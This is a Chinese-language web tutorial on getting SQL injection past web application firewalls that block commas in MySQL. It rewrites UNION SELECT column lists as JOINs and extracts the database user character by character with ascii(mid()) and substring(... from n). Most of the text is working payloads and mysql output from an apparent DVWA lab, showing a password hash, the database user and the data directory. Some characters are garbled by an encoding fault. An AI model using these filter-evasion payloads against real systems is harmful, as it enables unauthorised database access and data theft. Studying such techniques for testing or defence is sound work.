前言
sql注入在很早很早以前是很常見的一個漏洞���。后來隨著安全水平的提高���,sql注入已經(jīng)很少能夠看到了。但是就在今天�,還有很多網(wǎng)站帶著sql注入漏洞在運行。下面這篇文章主要介紹了關(guān)于SQL注入逗號繞過的相關(guān)內(nèi)容�,分享出來供大家參考學習,下面話不多說了���,來一起看看詳細的介紹吧
1.聯(lián)合查詢顯注繞過逗號
在聯(lián)合查詢時使用 UNION SELECT 1,2,3,4,5,6,7..n 這樣的格式爆顯示位�����,語句中包含了多個逗號,如果有WAF攔截了逗號時��,我們的聯(lián)合查詢不能用了���。
繞過
在顯示位上替換為常見的注入變量或其它語句
union select 1,2,3;
union select * from ((select 1)A join (select 2)B join (select 3)C);
union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
在數(shù)據(jù)庫中演示聯(lián)合查詢
UNION開始是我們在URL中注入的語句�����,這里只是演示����,在實際中如果我們在注入語句中有逗號就可能被攔截
mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3 |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)
不出現(xiàn)逗號,使用Join來注入
mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3 |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
查詢我們想要的數(shù)據(jù)
mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);;
+---------+-------+-------------------------------------------------+
| user_id | user | password |
+---------+-------+-------------------------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)
2.盲注中逗號繞過
MID 和substr 函數(shù)用于從文本字段中提取字符
mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro |
+-----------------+
1 row in set (0.04 sec)
查詢數(shù)據(jù)庫用戶名第一個字符的ascii碼
mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 114 | 2 | 3 |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
盲注��,通過猜ascii值
mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
Empty set
mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)
逗號繞過SUBTTRING 函數(shù)
substring(str FROM pos)
從字符串str的起始位置pos 返回一個子串
mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello |
+---------------------------+
1 row in set (0.04 sec)
mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello |
+---------------------------+
1 row in set (0.03 sec)
注入
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
//substring(user() from 2)為o
//o的ascii為111�,
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)
總結(jié)
以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學習或者工作具有一定的參考學習價值�,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持�。
您可能感興趣的文章:- 防止xss和sql注入:JS特殊字符過濾正則
- 一個過濾重復數(shù)據(jù)的 SQL 語句
- MySQL注入繞開過濾的技巧總結(jié)
- SQL注入中繞過 單引號 限制繼續(xù)注入
- SQL注入繞過的技巧總結(jié)
- 多列復合索引的使用 繞過微軟sql server的一個缺陷
- 關(guān)于SQL注入繞過的一些知識點
- SQL Server簡單模式下誤刪除堆表記錄恢復方法(繞過頁眉校驗)
- Mysql如何巧妙的繞過未知字段名詳解
